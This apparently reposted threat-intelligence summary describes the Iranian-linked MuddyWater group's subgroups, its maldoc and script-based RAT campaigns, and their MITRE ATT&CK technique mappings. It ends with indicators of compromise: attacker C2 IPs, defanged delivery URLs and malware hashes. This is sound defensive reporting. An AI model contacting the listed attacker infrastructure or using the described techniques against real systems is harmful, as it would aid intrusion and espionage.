Iranian linked conglomerate MuddyWater comprised of regionally focused subgroups

Talos links MuddyWater to Iranian interests and describes a conglomerate of sub-groups conducting global campaigns using maldocs, PowerShell/VB/JavaScript tooling, and Windows RATs such as SloughRAT to achieve espionage, IP theft, and potentially ransomware and destructive operations. The campaigns span Turkey, the Arabian Peninsula, Armenia, Pakistan, Jordan, and other regions, showing shared techniques across subgroups and evolving attack methods.
#MuddyWater #SloughRAT #Canopy #Ligolo #MERCURY #StaticKitten #MOIS #Iran #Turkey #ArabianPeninsula

Keypoints

MuddyWater is an Iranian-linked APT umbrella likely comprised of multiple sub-teams that operate independently but share techniques and tooling.
Campaigns commonly use maldocs to deploy PowerShell-, VB-, and JavaScript-based downloaders and RATs across Turkey, Asia, and the Middle East.
The SloughRAT WSF-based RAT is used in campaigns against the Arabian Peninsula (and Jordan), with obfuscated code that executes arbitrary commands from C2 servers.
Two additional script-based implants (VB and JavaScript) from 2019–2022 download and run commands on victims’ systems, expanding MuddyWater’s toolset.
MuddyWater relies on DNS for C2 contact and HTTP for initial host communication, frequently using living-off-the-land binaries and remote tools to establish footholds.
There is strong evidence of TTP sharing and gradual evolution of techniques across geographies, supporting the “group of groups” model rather than a single actor.
Targets include governments, universities, and private entities (e.g., telecom providers), with objectives spanning espionage, IP theft, and potentially ransomware/destructive operations.

MITRE Techniques

[T1059.001] PowerShell – Use of PowerShell to execute downloads and payloads. Quote: ‘PowerShell-based downloader malware.’
[T1059.005] Visual Basic – VB-based implant (late 2021 – 2022) that downloads and runs arbitrary commands. Quote: ‘Visual Basic (VB) … downloads and runs arbitrary commands on the victim’s system.’
[T1059.007] JavaScript – JavaScript-based implants (2019 – 2020) that download and run arbitrary commands. Quote: ‘one in JavaScript (2019 – 2020), which also downloads and runs arbitrary commands on the victim’s system.’
[T1566.001] Phishing – Malicious documents (maldocs) used to deploy downloaders and RATs. Quote: ‘malicious documents (maldocs) to deploy downloaders and RATs’
[T1021.001] Remote Services – Use of ConnectWise remote administration tool to gain initial foothold. Quote: ‘Connectwise Remote Administration tool’ (contextual mention of rapid access to targets).
[T1047] Windows Management Instrumentation (WMI) – RAT begins by performing a WMI query to record the IP address of the infected endpoint. Quote: ‘The RAT script begins execution by performing a WMI query to record the IP address of the infected endpoint.’
[T1071.001] Web Protocols – Initial contact with hosting servers is done via HTTP. Quote: ‘initial contact with hosting servers is done via HTTP.’
[T1071.004] Application Layer Protocol: DNS – DNS used to contact C2 servers. Quote: ‘MuddyWater frequently relies on DNS to contact their C2 servers.’
[T1547.001] Boot or Logon Autostart: Startup Folder – Persistence via the current user’s Startup folder. Quote: ‘Startup folder by the VBA macro to establish persistence across reboots.’
[T1053.005] Scheduled Task – Malicious VB/VBScript-based downloaders leverage scheduled tasks. Quote: ‘malicious scheduled tasks’
[T1027] Obfuscated/Compressed Files or Information – WSF RAT and related components are obfuscated to hide extensions. Quote: ‘The WSF implant has several capabilities. The script uses multilayer obfuscation to hide its true extensions.’
[T1572] Protocol Tunneling – Use of Ligolo reverse-tunneling tool to gain control over endpoints. Quote: ‘The attackers utilized SloughRAT to deploy Ligolo, an open-source reverse-tunneling tool to gain a greater degree of control over the infected endpoints.’
[T1041] Exfiltration Over C2 Channel – Data exfiltrated to and from the C2 via HTTP. Quote: ‘Any data sent to the C2 server is in the format of HTTP forms…’

Indicators of Compromise

[IP] Context – example endpoints used for C2 or hosting: 185.118.164.195, 5.199.133.149, 88.119.170.124, 178.32.30.3, 95.181.161.81, 185.183.97.25
[Domain] Domains involved in infrastructure or payload delivery: lalindustries.com, advanceorthocenter.com
[URL] C2/delivery URLs – examples: hxxp://185.118.164.195/c, hxxp://lalindustries.com/wp-content/upgrade/editor.php, hxxp://advanceorthocenter.com/wp-includes/editor.php, hxxp://95.181.161.81/mm57aayn230
[URL] Additional distribution/collection endpoints: hxxp://5.199.133.149/oeajgyxyxclqmfqayv, hxxp://178.32.30.3:80/kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9/gcvvPu2KXdqEbDpJQ33/
[File Hash] Maldocs – 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c, 026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
[File Hash] Maldocs – 7de663524b63b865e57ffc3eb4a339e150258583fdee6c2c2ca4dd7b5ed9dfe7, 6e50e65114131d6529e8a799ff660be0fc5e88ec882a116f5a60a2279883e9c4
[File Hash] WSF components – d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0, ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
[File Hash] VB-based downloader – fb69c821f14cb0d89d3df9eef2af2d87625f333535eb1552b0fcd1caba38281f
[File Hash] JS-based downloader – 202bf7a4317326b8d0b39f1fa19304c487128c8bd6e52893a6f06f9640e138e6, 3fe9f94c09ee450ab24470a7bcd3d6194d8a375b3383f768662c1d561dab878d
[File Hash] JS-based downloader – cf9b1e0d17199f783ed2b863b0289e8f209600a37724a386b4482c2001146784
[File Hash] EXE payloads – a500e5ab8ce265d1dc8af1c00ea54a75b57ede933f64cea794f87ef1daf287a1
[URL] Additional IOCs – 185.118.164.195/c, 5.199.133.149/oeajgyxyxclqmfqayv, 88.119.170.124/lcekcnkxkbllmwlpoklgof

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print